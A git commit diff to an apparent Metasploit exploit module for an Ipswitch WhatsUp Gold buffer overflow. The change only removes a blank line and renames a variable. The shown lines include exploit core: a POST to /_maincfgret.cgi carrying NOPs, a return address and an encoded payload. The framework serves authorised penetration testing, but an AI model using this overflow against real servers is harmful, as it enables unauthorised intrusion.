fixed spacing...
git-svn-id: file:///home/svn/framework3/trunk@4138 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
dbb3cf8482
commit
6117311fe0
|
@ -26,7 +26,6 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
},
|
},
|
||||||
|
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
|
@ -62,7 +61,7 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
|
||||||
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
|
||||||
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
|
||||||
|
|
||||||
sploit = c.request({
|
req = c.request({
|
||||||
'uri' => '/_maincfgret.cgi',
|
'uri' => '/_maincfgret.cgi',
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'data' => req,
|
'data' => req,
|
||||||
|
|
Loading…
Reference in New Issue